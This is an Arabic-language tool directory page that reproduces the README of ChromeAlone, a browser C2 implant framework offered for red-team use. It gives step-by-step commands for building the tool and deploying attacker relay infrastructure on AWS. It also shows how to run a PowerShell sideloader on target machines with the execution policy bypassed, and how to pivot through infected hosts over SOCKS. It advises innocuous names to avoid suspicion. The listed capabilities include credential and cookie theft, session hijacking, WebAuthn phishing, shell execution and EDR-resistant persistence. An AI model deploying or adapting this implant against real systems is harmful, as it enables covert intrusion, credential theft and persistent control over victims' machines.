Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/praetorian-inc/chromealone
تصعيد الامتيازاتآليات الاستمراريةاستغلال تطبيقات الويبما بعد الاستغلالالتصيد الاحتياليالقيادة والسيطرةالهندسة الاجتماعيةالفريق الأحمرتطوير الحمولات
GitHubpraetorian-inc/chromealone

ChromeAlone

أداة لتحويل متصفحات Chromium إلى أداة C2 اختراقية (Implant)

59676منذ 9 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

ChromeAlone - إطار عمل C2 للمتصفح

مخطط البنية

ما الذي سأحصل عليه من هذا؟

ChromeAlone هي أداة حقن (implant) للمتصفح يمكن استخدامها بدلاً من أدوات الحقن التقليدية مثل Cobalt Strike أو Meterpreter. يوفر هذا المستودع عملية بناء بسيطة من شأنها إنشاء وحدة تحكم إدارية ونشر البنية التحتية وإنشاء سكربت تحميل جانبي (sideloader) من Powershell ليعمل على الأجهزة المستهدفة.

بعد التثبيت، ستوفر كل أداة حقن من ChromeAlone آليات من أجل:

  • توفير وكيل SOCKS TCP على الجهاز المضيف
  • سرقة جلسات المتصفح والتقاط بيانات الاعتماد
  • تشغيل الملفات التنفيذية على الجهاز المضيف من خلال Chrome
  • التصيد لطلبات WebAuthn الخاصة برموز الأمان المادية مثل YubiKeys أو Titan Security Keys.
  • شكل من أشكال الثبات (persistence) المقاوم لمنتجات EDR على الجهاز المضيف يتم تنفيذه بالكامل باستخدام ميزات Chromium المدمجة.

تعليمات البناء

أولاً، قم ببناء حاوية docker: docker build -t chromealone .

تعليمات النشر

يوجد حاليًا وضعان مدعومان للنشر. لاحظ أنه في كلتا الحالتين، يجب تشغيل docker من الدليل الأساسي لمستودع ChromeAlone على git.

النشر من الصفر عبر AWS

للقيام بذلك، ستحتاج إلى حساب AWS تم تكوينه مع تخزين بيانات الاعتماد الخاصة بك في ~/.aws/credentials. تأكد من أن حسابك لديه أذونات كتابة كاملة على EC2 بالإضافة إلى أذونات Route53. كما أنه من المفترض أن Route53 لديك تم تكوينه بمنطقة استضافة واحدة على الأقل تحتوي على نطاق مسجّل. إذا تم استيفاء هذه الشروط، يمكنك تشغيل هذا الأمر.

root@kitploit:~
docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws chromealone --domain=sendmea.click --appname=UpdateService --region=us-west-2

يجب أن تتطابق قيمة domain مع نطاق يخضع لسيطرة إعداد Route53 لديك. يمكن أن تكون appname أي قيمة تريدها، وستُستخدم لتسمية العديد من مفاتيح التسجيل والمجلدات على القرص عند النشر. يُنصح باستخدام اسم غير ضار نسبيًا مثل UpdateService أو شيء بريء بالمثل. لاحظ أن region اختيارية، وستكون القيمة الافتراضية لها us-east-2 إذا لم يتم تحديدها.

سيؤدي هذا إلى نشر خادم الترحيل BATTLEPLAN على AWS وإنشاء المخرجات التالية:

output/client - تطبيق الويب للتحكم في إدارة تثبيتات ChromeAlone الخاصة بك.

output/sideloader.ps1 - سكربت التثبيت الذي يتم تشغيله على الأجهزة المستهدفة لإصابة مثيل المتصفح المحلي لديهم. ملاحظة: سيكون هناك أيضًا ملف iwa-sideloader.ps1 لتحميل تطبيق الويب المعزول (Isolated Web App) فقط، و extension-sideloader.ps1 لتحميل امتداد المتصفح فقط.

output/extension - امتداد المتصفح الضار الذي تم إنشاؤه.

output/iwa - ملف حزمة تطبيق الويب المعزول الضار الموقّع الذي تم إنشاؤه.

output/relay-deployment - مخرجات Terraform من نشر AWS الخاص بك بما في ذلك مفتاح SSH للوصول المباشر إلى المضيف.

إنشاء سكربتات نشر من خادم تم نشره مسبقًا

إذا كنت قد قمت بالفعل بنشر مثيل، فسيحتوي output/relay-deployment/terraform.tfvars على جميع المعلومات اللازمة لإنشاء سكربتات تحميل جانبي جديدة + امتدادات ضارة. يمكنك توجيه ملف docker الخاص بـ ChromeAlone إلى ملف tfvars وسيتم تخطي خطوة النشر مع الحفاظ على البيانات الوصفية المناسبة للتعامل مع الاتصالات.

قم بتشغيل سكربت البناء docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws chromealone --tfvars=/project/path/to/terraform.tfvars --appname=UpdateService وسيُنشئ أداة تحميل جانبي ضارة جديدة لنشرك.

التثبيت على الأجهزة المضيفة

خذ sideloader.ps1 وقم بتشغيله على جهاز Windows 10 أو Windows 11 المستهدف عن طريق تنفيذ powershell.exe ExecutionPolicy Bypass -File .\path\to\sideloader.ps1. لاحظ أنه يمكنك التشغيل مع علامات إضافية إذا كنت ترغب في تثبيت مضيف NativeMessaging (مطلوب لتنفيذ الأوامر من المتصفح) أو فرض إعادة تشغيل Chrome (ضروري إذا كنت تريد أن يعمل امتدادك فورًا بعد تشغيل هذا السكربت بدلاً من الانتظار حتى المرة التالية التي يفتح فيها المستخدم Chrome). مثال على استدعاء مع كلتا العلامتين هو powershell.exe -ExecutionPolicy Bypass .\sideloader.ps1 -InstallNativeMessagingHost $true -ForceRestart $true. يمكنك أيضًا تعديل القيم الافتراضية في أعلى السكربت من false إلى true إذا كنت ترغب في استخدام هذه العلامات تلقائيًا.

سيستغرق تنفيذ السكربت بالكامل حوالي 20-30 ثانية.

تعليمات المشغّل

بمجرد تحميل ChromeAlone، يمكنك عرض أي أجهزة مضيفة متصلة عن طريق فتح output/client/index.html. سيكون تطبيق الويب هذا مُهيأ مسبقًا للاتصال بمثيل BATTLEPLAN relay الذي قمت بنشره. لاحظ أنه بشكل افتراضي، يكون المرحّل محميًا بجدار حماية يسمح فقط بالوصول الوارد للتحكم على المنافذ 1080-1181 من عنوان IP الذي نشر الخادم. إذا كنت ترغب في تعديل ذلك، فستحتاج إلى تحديث إعدادات الشبكة لمثيل EC2 لتشمل أي أجهزة إضافية.

يمكن تشغيل معظم الأوامر من واجهة الويب بما في ذلك:

  • تفريغ السجل + ملفات تعريف الارتباط (عبر قسم Quick Commands، الأمر الذي يتطلب تحديد وكيل مستهدف في قسم Execute Command)
  • التقاط بيانات الاعتماد (ستظهر عبر تبويب Captured Data)
  • فرض طلبات WebAuthn (عبر قسم Execute Command)
  • قراءة نظام الملفات (عبر تبويب File Browser)
  • تنفيذ أوامر Shell (عبر تبويب Interactive Shell)

الاستثناء الرئيسي من ذلك هو بروكسي SOCKS. يتم تعيين منفذ SOCKS فريد لكل جهاز مصاب على الخادم ويمكن رؤيته في قسم Agent Information، حيث يكون لكل وكيل حقل Port. يمكن استخدام المنفذ المعيّن، عند دمجه مع بيانات اعتماد admin المخزنة في output/client/config.js، لتكوين بروكسي SOCKS خاص بمضيف معين.

على سبيل المثال، لنفترض أن لدينا وكيلًا منفذه هو 1081، ونطاقنا هو chrome.alone، واسم المستخدم admin (هذا هو الحال دائمًا)، وكلمة المرور thisisnotarealpassword. فيما يلي بعض الأمثلة على الاستخدام:

root@kitploit:~
proxychains -q socks5 admin:[email protected]:1081 curl http://ifconfig.me
xfreerdp /cert:ignore /v:<target RDP host> /u:<target RDP username> /proxy:socks5://admin:[email protected]:1081
curl -x socks5h://chrome.alone:1081 -u "admin:thisisnotarealpassword" http://ifconfig.me

ماذا يوجد في هذا المستودع؟

ينقسم مستودع ChromeAlone إلى مكونات، يمكن استخدام العديد منها بشكل فردي كجزء من اختبار تقييم - ولكنها معًا تمثل سلسلة أدوات الحقن الكاملة لمتصفح Chromium.

  • BATTLEPLAN - هذا هو مكوّن خادم الإدارة في سلسلة الأدوات. يحتوي على سكربتات terraform للنشر في بيئة AWS بالإضافة إلى عميل HTML للتفاعل مع الخادم بعد النشر.

  • BLOWTORCH - هذا تطبيق ويب معزول ضار يستخدم أذونات Direct Socket لتنفيذ بروكسي SOCKS TCP وخادم websocket لتمكين الاتصالات بين مكونات Chrome الأخرى. كما أنه يعمل كجسر تراسل يعود إلى خادم الترحيل BATTLEPLAN.

  • DOORKNOB - هذه سلسلة من السكربتات المستخدمة لتوليد أدوات تحميل جانبي Powershell لتطبيقات الويب المعزولة وامتدادات Chrome. يوفر السكربت في build.sh مثالًا على كيفية إنشاء سكربت تثبيت Powershell واحد يجمع بين هاتين الأداتين الفرديتين للتحميل الجانبي في أداة واحدة.

  • HOTWHEELS - هذا امتداد Chrome ضار ينفذ جميع إمكانياته في Web Assembly. يوفر الغالبية العظمى من مجموعات ميزات ChromeAlone لالتقاط بيانات الاعتماد، واختطاف الجلسات، وتنفيذ الأوامر، وقراءة نظام الملفات.

  • PAINTBUCKET - سلسلة من سكربتات المحتوى التي تتيح التصيد لطلبات WebAuthn عن طريق إخفاء طلبات WebAuthn إضافية داخل iFrames في علامات التبويب غير النشطة كلما تم تقديم طلب WebAuthn عادي.

من صنع هذا؟

تمت كتابة هذه الأداة بواسطة Mike Weber من Praetorian Security.

المراجع

هذا العمل مبني على إسهامات العديد من أدوات الباحثين والمقالات التقنية الأخرى في هذا المجال. بدون أعمالهم، لم يكن هذا المشروع ليكون موجودًا. إذا كنت تبحث عن التعمق أكثر في التفاصيل الداخلية التي يستخدمها هذا المشروع، أقترح قراءة الموارد التالية:

  • Silent Chrome - https://github.com/asaurusrex/Silent_Chrome
  • Return of the Extension - https://syntax-err0r.github.io/Return_Of_The_Extension.html
  • CursedChrome - https://github.com/mandatoryprogrammer/CursedChrome
  • https://www.adlice.com/google-chrome-secure-preferences/
  • هجمات سلسلة التوريد لامتدادات المتصفح - https://www.darktrace.com/blog/cyberhaven-supply-chain-attack-exploiting-browser-extensions
  • التحميل الجانبي لـ LummaC2 - https://www.esentire.com/blog/lummac2-malware-and-malicious-chrome-extension-delivered-via-dll-side-loading
  • BlinkOn 19 - https://www.youtube.com/watch?v=Q3b5NB-7HQQ
  • RedExt - https://github.com/Darkrain2009/RedExt
  • اختطاف المزامنة للمتصفح - https://labs.sqrx.com/browser-syncjacking-cc602ea0cbd0
  • شرح تطبيقات الويب المعزولة - https://github.com/WICG/isolated-web-apps
  • مقال عن LevelDB - https://www.cclsolutionsgroup.com/post/hang-on-thats-not-sqlite-chrome-electron-and-leveldb
  • شرح DirectSockets - https://wicg.github.io/direct-sockets/
  • التصيد عبر WebUSB لـ Yubikey - https://www.wired.com/story/chrome-yubikey-phishing-webusb/
  • تطوير امتدادات المتصفح الهجومية - https://www.irongeek.com/i.php?page=videos/derbycon8/track-4-02-offensive-browser-extension-development-michael-weber

الترخيص

ChromeAlone مرخص بموجب رخصة Apache، الإصدار 2.0.

root@kitploit:~
Copyright 2025 Praetorian Security, Inc

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
تنزيل الأداة